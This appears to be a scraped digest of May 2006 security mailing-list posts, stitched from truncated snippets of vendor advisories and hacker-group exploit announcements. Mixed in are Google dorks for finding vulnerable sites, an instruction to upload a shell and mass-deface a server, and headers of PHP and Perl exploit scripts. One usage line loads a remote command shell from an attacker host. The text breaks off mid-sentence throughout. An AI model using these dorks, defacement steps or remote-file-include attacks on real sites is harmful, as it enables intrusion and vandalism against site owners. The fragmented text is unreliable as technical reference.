google dork: inurl:x-poll
and add to /admin/images/add.php, upload a shell, and mass deface the server
www.ayyildiz.org
[i] Limbo CMS (option=weblinks) sql injection exploit
[i] Cyber-Security.ORG | Security Advisory | Security Editor by SnoB | Turkish hacking | security{!}
<?php
if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))
{
?>
[*] Usage: <?echo
google dork : Phil's Bookmark
and to the last path add admin.php?edit=[item id]
example: www.site.com/bookmarks/admin.php?edit=1
www.ayyildiz.org
ORIGINAL ADVISORY:
http://myimei.com/security/2006-05-07/mybb111email-verification-in-user-activation-sql-injection-attack.html
-Summary-
Software: MyBB
Software's Web Site: http://www.mybboard.com
Versions: 1.1.1
Class: Remote
Status: Unpatched
Exploit: Available
Solution:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
The security module (BankTown Client Control 1,4,2,51817) mentioned above
is currently no longer in use.
For those who did not remove it and still have it on their PCs, a new
security patch has been released so that it is no longer vulnerable to those
kinds of attacks.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1052-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 8th, 2006
Title: CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC vulnerability
CA Vulnerability ID: 34013
CA Advisory Date: 2006-05-02
Discovered By: IBM Global Services
Impact: Local attacker can gain escalated privileges.
Summary:
A potential vulnerability issue exists in our CAIRIM LMP
#!/usr/bin/perl
# Dokeos Learning Management System 1.6.4 Remote File Include
# Exploit Advisory: beford xbefordx gmail com
#
# usage: # perl own.pl host cmd-shell-url cmd-var
# perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
#
# cmd
= CodeScan Advisory, codescan.com [EMAIL PROTECTED]
=
= Multiple Vulnerabilities In IdealBB ASP Bulletin Board
=
= Vendor Website:
= http://www.idealscience.com
=
= Affected Version:
= Version 1.5.4a And Earlier
=
=
#
# Description
#
# Vendor: http://www.claroline.net
# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
# clarolineRepositorySys in an include() call without it being declared.
# There are other files vulnerable in the same folder, this exploit only
#
SOFTWARE:
=
singapore v0.9.7
DESCRIPTION:
The system is vulnerable to various XSS attacks
google dork : Powered by singapore v0.9.7 inurl:index.php?gallery
429 results :)
xss code example
www.site.com/images/index.php?gallery=[gallery
INFIGO IS Security Advisory #ADV-2006-05-03
http://www.infigo.hr/
Title: Multiple FTP Servers vulnerabilities
Advisory ID: INFIGO-2006-05-03
Date: 2006-05-05
Advisory URL: http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03
Impact: Remote code
# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB] :}
# To insist on socialism is to insist on being human. Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED]
# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Kurdish Security Advisory
# phpRaid Remote File Include [SMF] :}
# To insist on socialism is to insist on being human. Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED]
# Risk : High
# Class : Remote
# Script : phpRaid
# Script
This was fixed in the recent security update (IPB.Blog 1.2.3) after an internal audit.
http://forums.invisionpower.com/index.php?showtopic=214248view=getnewpost
==
Secunia Research 08/05/2006
- TZipBuilder ZIP File Handling Buffer Overflow Vulnerability -
==
Table of Contents
Affected
===
Ubuntu Security Notice USN-282-1 May 08, 2006
nagios vulnerability
CVE-2006-2162
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.04 (Hoary
===
Ubuntu Security Notice USN-283-1 May 08, 2006
mysql-dfsg-4.1, mysql-dfsg vulnerabilities
CVE-2006-1516, CVE-2006-1517
===
A security issue affects the following Ubuntu
==
Secunia Research 08/05/2006
- Anti-Trojan unacev2.dll Buffer Overflow Vulnerability -
==
Table of Contents
Affected
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: WebSense content filter
Folks,
During some specific tests with our upcoming Web App Security Scanner tool,
we have found that Apache would kindly accept HTML injection through the
Expect header. Originally meant to be a protocol flow control that would
give the web client the capacity of sending the HTTP headers for
ZDI-06-012: Sophos Anti-Virus CAB Unpacking Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-013.html
May 8, 2006
-- CVE ID:
CVE-2006-0994
-- Affected Vendor:
Sophos Plc.
-- Affected Products:
Sophos Anti-Virus for Windows, Mac OS, Unix, Linux, NetWare, OS/2,
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload \r\n";
echo "local inclusion vulnerabilities\r\n";
echo "by rgod [EMAIL PROTECTED]";
echo "site: http://retrogod.altervista.org\r\n\r\n";
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path
[MajorSecurity] phpListPro <= 2.01 - Multiple Remote File Include Vulnerability
Software: phpListPro
Version: <= 2.01
Type: Multiple Remote File Include Vulnerability
Date: May, 8th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cisco Response
==
This is Cisco PSIRT's response to the statements made by Symantec in
its advisory: SYMSA-2006-003, posted on May 8, 2006.
The original email/advisory is available at: